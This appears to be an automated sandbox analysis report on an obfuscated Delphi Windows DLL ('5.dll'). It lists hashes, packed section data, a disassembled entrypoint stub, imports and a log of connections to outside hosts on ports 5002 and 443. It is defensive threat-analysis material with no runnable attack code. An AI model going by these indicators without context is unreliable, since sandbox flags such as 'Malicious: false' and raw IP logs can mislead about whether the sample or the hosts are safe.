SSDEEP:	6144:t41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+twmBMZJh1Vj/:a1/YCW2AoQ0NiHwwMHrVT
MD5:	C3F934B2A877D47E48ABC7B2FE3BAE90
SHA1:	3E23C7ADA083C6ADFD6143BCA31DD31366EAAD7B
SHA-256:	21008DAE14BB6C09EB4D03CA22A89875D72EC92D5D04EC1146E896056F61515A
SHA-512:	9079DE0E5F84DE7F1654676376D826E630E138727248D37D0F360F8F6DB8AC43ECD9780BEC3862F229BD2FBC7337661234A624B4938B05954DE068A8E2042F9F
Malicious:	false
Preview:	regfI...I....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.>.;4...............................................................................................................................................................................................................................................................................................................................................T!..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.395258264822467
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5.dll
File size:	26'549'367 bytes
MD5:	a1d3922228fcfb9b734d3d92213cf525
SHA1:	21834950d507117c0c9d9e4c42c76c1e5f41b61c
SHA256:	b84bad0674108e09eb3c974e8ffbaf901e69ca2939dfe70527fb369fe2df831e
SHA512:	d6d783f269831120902c718b1696865df89e649dbcc51bc93ff86feaf4a4944d2c8593cc3c8d5f4a6983379b4e961b453101406ab70ea150379aa3cc63d15b43
SSDEEP:	393216:TS1wSi0DGQ6h03sRIPNjIILppBc284JEIFi3rEf8LVuqL9Ha5Ate:YwSi08hE0qTfBcH4HFs0IVuqLFaH
TLSH:	8447120671C640BAD0C61D799B3BA3DA267B76736D45CC3B2BD0380C8E71FA2A53A553
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x148f51a
Entrypoint Section:	pCck@0(<
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x66FD8BC8 [Wed Oct 2 18:07:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ee93a244a88e1d813de73a39466e183e

Entrypoint Preview

Instruction
call 00007F03BD579FE2h
inc ecx
movsx ebx, ch
dec edx
lea edx, dword ptr [05B44D97h+edx*8]
dec edx
mov dword ptr [esp+edx-1A2ECF8Ah], ebp
retn 0008h
out 0Fh, eax
mov al, byte ptr [48F624F0h]
cmp al, D7h
dec edx
and ah, byte ptr [ebx+4C6C5565h]
daa
test esp, 6AAC3011h
cmp bp, cx
or esi, edi
dec di
movsx edi, cx
inc ebx
mov dword ptr [ebp-08h], ebx
sbb di, ax
btr ebx, 1Fh
movzx edi, word ptr [ecx]
movzx ebx, di
movzx cx, ch
mov ecx, eax
shr ecx, 0Bh
cmp bx, 380Fh
cmc
imul ecx, ebx
cmp esi, ecx
jmp 00007F03BD3EBDF2h
inc edi
mov ebx, dword ptr [ecx+edx-798932DAh]
dec ecx
xor esi, edx
dec eax
cdq
dec edi
lea ecx, dword ptr [ecx+esi*2+06h]
inc ebp
sbb ebp, esi
inc ebp
xor ebx, edi
call 00007F03BD5C0072h
inc esi
xor dword ptr [esp+eax*8-6DCCF708h], esi
dec edx
mov dword ptr [esp+eax-0DB99EE2h], 00B15C1Ch
inc ecx
xchg eax, ebx
dec esi
mov edi, dword ptr [esp+eax*2-1B733DBCh]
dec edx
sub dword ptr [esp+eax-0DB99EE2h], 00A1902Ch
dec eax
and ecx, D0B4C729h
dec ebp
arpl si, si
dec ecx
adc ebp, esi
cwde
inc ebp
xadd ah, al
inc ebp
movsx esi, bl
inc edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4f3000	0xbf	1eWe9Dpo
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10ccc90	0x17c	pCck@0(<
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18d0000	0x2ae14	M;H3Mr
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18fb000	0x65f48	U(#)2R<D
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf0f000	0x94	Rjm*8iMX
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xf397b4	0x1e0	pCck@0(<
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.IiZ_A$8	0x1000	0x4c3d70	0x4c3e00	322552987982a4a983c0567333b268d1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
bO\=]JeA	0x4c5000	0x3a48	0x3c00	781934cd147e6abdf4499b278403306c	False	0.492578125	data	6.027546909997057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
>9P5ZP$	0x4c9000	0x19d4c	0x19e00	9aedaaee7e79cff57a46e9c34642fd8e	False	0.4622490187198068	data	6.768493247962655	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
\(SnMqUq	0x4e3000	0x9c38	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cKc<oclJ	0x4ed000	0x451a	0x4600	99db6cb95d2e95c4c76a556c14ebb40d	False	0.9631138392857143	data	7.85059755849746	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
L2(#1D;	0x4f2000	0xd84	0xe00	7fe3ea6c948e2e2927f5c6e7ae3d5fcf	False	0.34598214285714285	data	4.34769161039455	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
1eWe9Dpo	0x4f3000	0xbf	0x200	a0e74cdabbfd8b5d7c7c83a11174a5f9	False	0.330078125	data	2.4306219688208452	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
PC2X@$2+	0x4f4000	0x45	0x200	4ae75964954652113b5bc6e6bf8e2eec	False	0.158203125	ASCII text, with no line terminators	1.1775367479159162	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
]8;-`=q(	0x4f5000	0xa19316	0xa19400	a839e8856b3ab7776d0f63256d0294e8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Rjm*8iMX	0xf0f000	0xac	0x200	91f1cefee18819888aece1142e644060	False	0.205078125	data	1.2805495164319396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pCck@0(<	0xf10000	0x9bfbc0	0x9bfc00	eea310c6b43ea53c5f43bc3a25370fc9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
M;H3Mr	0x18d0000	0x2ae14	0x2b000	a066c0b11138d350a11555827ee8ae31	False	0.21763717296511628	data	5.327431817690985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
U(#)2R<D	0x18fb000	0x65f48	0x66000	37320a4fdd1e5284679cb3427ee0491c	False	0.5829168581495098	data	6.7318740924489235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x18d23b0	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d24e4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x18d2618	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x18d274c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x18d2880	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x18d29b4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x18d2ae8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_CURSOR	0x18d2c1c	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d2d50	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d2e84	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d2fb8	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d30ec	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3220	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3354	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3488	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d35bc	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d36f0	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3824	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3958	0x134	data	Portuguese	Brazil	0.12012987012987013
RT_CURSOR	0x18d3a8c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_BITMAP	0x18d3bc0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x18d3d90	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x18d3f74	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x18d4144	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x18d4314	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x18d44e4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x18d46b4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x18d4884	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x18d4a54	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x18d4c24	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x18d4df4	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x18d4eb4	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x18d4f94	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x18d5074	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x18d5154	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x18d5214	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x18d52d4	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x18d53b4	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x18d5474	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x18d5554	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x18d5614	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_STRING	0x18d56f4	0x30c	data			0.3923076923076923
RT_STRING	0x18d5a00	0x534	data			0.3506006006006006
RT_STRING	0x18d5f34	0x62c	data			0.29430379746835444
RT_STRING	0x18d6560	0x904	data			0.292894280762565
RT_STRING	0x18d6e64	0xbf0	data			0.21727748691099477
RT_STRING	0x18d7a54	0x4c4	data			0.38688524590163936
RT_STRING	0x18d7f18	0x474	data			0.4043859649122807
RT_STRING	0x18d838c	0xff4	data			0.2051909892262488
RT_STRING	0x18d9380	0xa94	data			0.31056129985228953
RT_STRING	0x18d9e14	0x9fc	data			0.3227699530516432
RT_STRING	0x18da810	0x918	data			0.27963917525773196
RT_STRING	0x18db128	0x6e8	data			0.3003393665158371
RT_STRING	0x18db810	0x52c	data			0.3935045317220544
RT_STRING	0x18dbd3c	0x378	data			0.38738738738738737
RT_STRING	0x18dc0b4	0x518	data			0.3688650306748466
RT_STRING	0x18dc5cc	0x3d8	data			0.40040650406504064
RT_STRING	0x18dc9a4	0x404	data			0.3959143968871595
RT_STRING	0x18dcda8	0x3a0	data			0.4040948275862069
RT_STRING	0x18dd148	0x40c	data			0.4015444015444015
RT_STRING	0x18dd554	0x3f8	data			0.42322834645669294
RT_STRING	0x18dd94c	0x374	data			0.39819004524886875
RT_STRING	0x18ddcc0	0x378	data			0.33783783783783783
RT_STRING	0x18de038	0x2e0	data			0.4470108695652174
RT_STRING	0x18de318	0x3d8	data			0.3333333333333333
RT_STRING	0x18de6f0	0x448	data			0.37135036496350365
RT_STRING	0x18deb38	0x438	data			0.37592592592592594
RT_STRING	0x18def70	0x3a4	data			0.34012875536480686
RT_STRING	0x18df314	0x3f8	data			0.4104330708661417
RT_STRING	0x18df70c	0x184	data			0.5463917525773195
RT_STRING	0x18df890	0xcc	data			0.6666666666666666
RT_STRING	0x18df95c	0x1e0	data			0.5145833333333333
RT_STRING	0x18dfb3c	0x288	data			0.49074074074074076
RT_STRING	0x18dfdc4	0x35c	data			0.3953488372093023
RT_STRING	0x18e0120	0x3c0	data			0.371875
RT_STRING	0x18e04e0	0x410	data			0.3903846153846154
RT_STRING	0x18e08f0	0x564	data			0.32463768115942027
RT_STRING	0x18e0e54	0x2dc	data			0.3483606557377049
RT_STRING	0x18e1130	0x3b8	data			0.4275210084033613
RT_STRING	0x18e14e8	0x410	data			0.3817307692307692
RT_STRING	0x18e18f8	0x608	data			0.31865284974093266
RT_STRING	0x18e1f00	0x420	data			0.4128787878787879
RT_STRING	0x18e2320	0x4a0	data			0.32094594594594594
RT_STRING	0x18e27c0	0x3b0	data			0.3792372881355932
RT_STRING	0x18e2b70	0x404	data			0.36770428015564205
RT_STRING	0x18e2f74	0x350	data			0.3867924528301887
RT_STRING	0x18e32c4	0xd4	data			0.5283018867924528
RT_STRING	0x18e3398	0xa4	data			0.6524390243902439
RT_STRING	0x18e343c	0x2dc	data			0.46311475409836067
RT_STRING	0x18e3718	0x458	data			0.29856115107913667
RT_STRING	0x18e3b70	0x31c	data			0.42462311557788945
RT_STRING	0x18e3e8c	0x2e8	data			0.3736559139784946
RT_STRING	0x18e4174	0x398	data			0.29891304347826086
RT_RCDATA	0x18e450c	0x10	data			1.5
RT_RCDATA	0x18e451c	0x1870	data			0.559462915601023
RT_RCDATA	0x18e5d8c	0x2	data	English	United States	5.0
RT_RCDATA	0x18e5d90	0x157	Delphi compiled form 'Tah0pkob1220que7g180mzatdk73ekqu8xt806'			0.7434402332361516
RT_RCDATA	0x18e5ee8	0x1263	Delphi compiled form 'Tbbyin3jcnw8gh06c26mw46ssx0l0slb03'			0.3171871680475887
RT_RCDATA	0x18e714c	0x107a	Delphi compiled form 'Tbqiaz3gj09fob9h12gh1d901n8043tp93m'			0.3134186818397345
RT_RCDATA	0x18e81c8	0x42f2	Delphi compiled form 'Tea14nhm0s13rjhc0moo395oj2h821obq5b'			0.20819232115766134
RT_RCDATA	0x18ec4bc	0x1a69	Delphi compiled form 'Tef44syubz9ws015wt5757u1rl645cfilzek8up'			0.43543854459399495
RT_RCDATA	0x18edf28	0x450	Delphi compiled form 'Tekfsc87526u1t17z003d8f0r311tq7j50g65'			0.5552536231884058
RT_RCDATA	0x18ee378	0xcf4	Delphi compiled form 'Tgen490gb2892g26e26mdkfz8l0h4fa64go87547'			0.3528347406513872
RT_RCDATA	0x18ef06c	0xb87	Delphi compiled form 'Thnxbkgk3l7895b47x4t02l0o3uyht'			0.3856319891562182
RT_RCDATA	0x18efbf4	0x145f	Delphi compiled form 'Tiju31et32iqy2z8e7q34m0c0k4w0bkf4f928r18n'			0.26826462128475553
RT_RCDATA	0x18f1054	0x390	Delphi compiled form 'Tkd4e8bydoro0i0pc1zf5lbu39rg7'			0.5932017543859649
RT_RCDATA	0x18f13e4	0x1593	Delphi compiled form 'Tlbi520870xhusokc26g7ne2l6ek1nwd'			0.296215824732935
RT_RCDATA	0x18f2978	0xaa7	Delphi compiled form 'Tncsdni3lg4n4qy0o6wmgy7mbyof3ouz01'			0.4118078474514118
RT_RCDATA	0x18f3420	0xf95	Delphi compiled form 'Tnf8l04yat9up0hq7j2c51700y00wq545oq0h35'			0.35422411631987966
RT_RCDATA	0x18f43b8	0x112f	Delphi compiled form 'Tnhxnsherda789i659m86792qt6d7429np57'			0.31007047056149123
RT_RCDATA	0x18f54e8	0xfe2	Delphi compiled form 'Tpdau670i8ic7j5iw9sp955u0o0g6ij8a1'			0.2892277422528283
RT_RCDATA	0x18f64cc	0x53d	Delphi compiled form 'Tplfsgu0rqqitz15f60p31701n4a67'			0.5645041014168531
RT_RCDATA	0x18f6a0c	0x128	Delphi compiled form 'Trzhu5h8g0xwapf38w33lfosq83i567'			0.7601351351351351
RT_RCDATA	0x18f6b34	0x804	Delphi compiled form 'Tswzp2rwwwjak0r59cy1h3096a1c88582mi04s'			0.49902534113060426
RT_RCDATA	0x18f7338	0x1d98	Delphi compiled form 'Twh80wt3dxfst5354qaug259ggx0h'			0.2659714889123548
RT_RCDATA	0x18f90d0	0x2eb	Delphi compiled form 'Twmlu1m9010e64a460crbol309707apl6w9'			0.6144578313253012
RT_RCDATA	0x18f93bc	0x16ad	Delphi compiled form 'Tymx107510lc6w0p909555mjndh0plp12xmqp4791z'			0.2935400516795866
RT_GROUP_CURSOR	0x18faa6c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.25
RT_GROUP_CURSOR	0x18faa80	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faa94	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faaa8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faabc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faad0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faae4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18faaf8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab20	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab34	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab48	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Portuguese	Brazil	1.3
RT_GROUP_CURSOR	0x18fab70	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x18fab84	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x18fab98	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x18fabac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x18fabc0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x18fabd4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x18fabe8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_VERSION	0x18fabfc	0x218	data	English	United States	0.47388059701492535

Imports

DLL	Import
winmm.dll	PlaySoundW
wininet.dll	InternetCloseHandle
winspool.drv	DocumentPropertiesW
comctl32.dll	ImageList_GetImageInfo
shell32.dll	SHGetSpecialFolderLocation
user32.dll	DdeSetUserHandle
version.dll	GetFileVersionInfoSizeW
oleaut32.dll	GetErrorInfo
advapi32.dll	RegSetValueExW
netapi32.dll	NetWkstaGetInfo
msvcrt.dll	memcpy
winhttp.dll	WinHttpGetIEProxyConfigForCurrentUser
kernel32.dll	GetVersion, GetVersionExW
SHFolder.dll	SHGetFolderPathW
wsock32.dll	gethostbyaddr
ole32.dll	OleRegEnumVerbs
gdi32.dll	Pie
ntdll.dll	RtlCompressBuffer

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x46ef38
__dbk_fcall_wrapper	2	0x412fcc
azo06olt3gs7uifwf18b8	4	0x8b6e7c
dbkFCallWrapperAddr	1	0x8e6640

Possible Origin

Language of compilation system	Country where language is spoken	Map
Portuguese	Brazil
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 03:34:37.481623888 CEST	49722	5002	192.168.2.10	208.109.246.134
Oct 3, 2024 03:34:37.487381935 CEST	5002	49722	208.109.246.134	192.168.2.10
Oct 3, 2024 03:34:37.487471104 CEST	49722	5002	192.168.2.10	208.109.246.134
Oct 3, 2024 03:34:37.871469975 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:37.871504068 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:37.871603966 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:37.873122931 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:37.873133898 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:38.481822014 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:38.481965065 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:38.483983994 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:38.484024048 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:38.484334946 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:38.525800943 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:38.538467884 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:38.579413891 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:39.962605953 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:39.962699890 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:39.962824106 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:39.972552061 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:39.972604990 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:39.972637892 CEST	49723	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:39.972654104 CEST	443	49723	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.165656090 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.165714025 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.166022062 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.166304111 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.166323900 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.633872032 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.633939028 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.635229111 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.635241985 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.635585070 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.636830091 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.683401108 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.776328087 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.776421070 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.776514053 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.777405024 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.777431011 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.777452946 CEST	49724	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.777461052 CEST	443	49724	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.897788048 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.897875071 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:40.897952080 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.898257017 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:40.898272991 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.355371952 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.355551958 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.356956959 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.356971979 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.357248068 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.358560085 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.403398991 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.489017963 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.489137888 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.489211082 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.489383936 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.489407063 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.489419937 CEST	49725	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.489424944 CEST	443	49725	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.598375082 CEST	49726	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.598449945 CEST	443	49726	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.598568916 CEST	49726	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.598913908 CEST	49726	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.598925114 CEST	443	49726	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.797532082 CEST	49726	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.803771973 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.803813934 CEST	443	49727	104.20.3.235	192.168.2.10
Oct 3, 2024 03:34:41.803910971 CEST	49727	443	192.168.2.10	104.20.3.235
Oct 3, 2024 03:34:41.804203033 CEST	49727	443	192.168.2.10	104.20.3.235
